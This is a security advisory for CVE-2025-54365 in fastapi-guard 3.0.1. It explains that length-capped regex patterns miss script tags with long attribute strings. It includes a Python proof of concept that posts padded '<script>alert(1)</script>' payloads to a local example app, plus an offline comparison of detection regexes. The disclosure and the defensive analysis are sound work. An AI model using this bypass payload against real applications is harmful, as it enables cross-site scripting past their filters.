
CVE-2025-54365 fastapi-guard

Package

Manager: pip
Name: fastapi-guard
Vulnerable Version: =3.0.1 || >=3.0.1 <3.0.2

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:U/RL:O/RC:R

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N/E:P

EPSS: 0.00103 (percentile 0.28844)

Details

FastAPI Guard has a regex bypass

### Summary

The regular expression patched to mitigate the ReDoS vulnerability by limiting the length of the string fails to catch inputs that exceed this limit.

### Details

In version 3.0.1, you can find a commit like the one in the link below, which was made to prevent ReDoS.

https://github.com/rennf93/fastapi-guard/commit/d9d50e8130b7b434cdc1b001b8cfd03a06729f7f

This commit mitigates the vulnerability by limiting the length of the input string, as shown in the example below.

`r"<script[^>]*>[^<]*<\/script\s*>"` -> `<script[^>]{0,100}>[^<]{0,1000}<\/script\s{0,10}>`

This type of patch fails to catch cases where the string representing the attributes of a `<script>` tag exceeds 100 characters. Therefore, most of the regex patterns present in version 3.0.1 can be bypassed.

### PoC

1. Clone the fastapi-guard repository.
2. Navigate to the examples directory and modify the main.py source code. Change the HTTP method for the root route from GET to POST.
3. After that, set up the example app environment by running the docker-compose up command. Then, run the Python code below to verify that the two requests return different results.
```python
import requests

URL = "http://localhost:8000"

# First request: a plain <script> tag, which the patched pattern still catches
obvious_payload = {"obvious": "<script>alert(1);</script>"}
response = requests.post(url=URL, json=obvious_payload)
print(f"[+] response of first request: {response.text}")

# Second request: 100 extra characters push the tag's attribute string
# past the {0,100} bound in the patched pattern
padding = "a" * 100
bypassed_payload = {
    "suspicious": f'<script id="i_can_bypass_regex_filtering{padding}">alert(1)</script>'
}
response = requests.post(url=URL, json=bypassed_payload)
print(f"[+] response of second request: {response.text}")
```

### Impact

Due to this vulnerability, most of the regex patterns can potentially be bypassed, making the application vulnerable to attacks such as XSS and SQL Injection.
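The bypass described above can be reproduced offline against the two patterns quoted in the advisory, without the example app. This is an added example, not fastapi-guard's code; the `hardened_detect` function and its `MAX_INPUT_LEN` are assumptions of this example, showing one defensive alternative: cap the whole input and fail closed on over-limit data instead of silently letting it through.

```python
import re

# Pre-patch pattern and the length-limited pattern from fastapi-guard 3.0.1,
# as quoted in the advisory.
ORIGINAL = re.compile(r"<script[^>]*>[^<]*<\/script\s*>")
PATCHED = re.compile(r"<script[^>]{0,100}>[^<]{0,1000}<\/script\s{0,10}>")

# Assumed hardened variant (not the project's code): bound the total input
# size up front and treat anything larger as suspicious, so the length cap
# cannot become a bypass. [^>]* followed by a literal '>' cannot run away,
# because the class never consumes the terminator it is searching for.
MAX_INPUT_LEN = 4096
HARDENED = re.compile(r"<script\b[^>]*>")


def hardened_detect(value: str) -> bool:
    """Return True when the value should be blocked."""
    if len(value) > MAX_INPUT_LEN:
        return True  # fail closed: too large to scan, do not pass it through
    return HARDENED.search(value) is not None


def compare(payload: str) -> dict:
    """Show which of the three checks flags the payload."""
    return {
        "original": ORIGINAL.search(payload) is not None,
        "patched": PATCHED.search(payload) is not None,
        "hardened": hardened_detect(payload),
    }


# Constructed inputs mirroring the advisory's two requests.
OBVIOUS = "<script>alert(1);</script>"
BYPASS = (
    '<script id="i_can_bypass_regex_filtering' + "a" * 100 + '">alert(1)</script>'
)

if __name__ == "__main__":
    for name, payload in (("obvious", OBVIOUS), ("bypass", BYPASS)):
        print(name, compare(payload))
```

The attribute string in `BYPASS` is 134 characters long, so `[^>]{0,100}` can never reach the closing `>` and the patched pattern returns no match, while both the original and the hardened check still flag it.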

Metadata

Created: 2025-07-23T15:31:12Z
Modified: 2025-07-24T12:46:22Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-rrf6-pxg8-684g/GHSA-rrf6-pxg8-684g.json
CWE IDs: ["CWE-185", "CWE-20"]
Alternative ID: GHSA-rrf6-pxg8-684g
Finding: F211
Auto approve: 1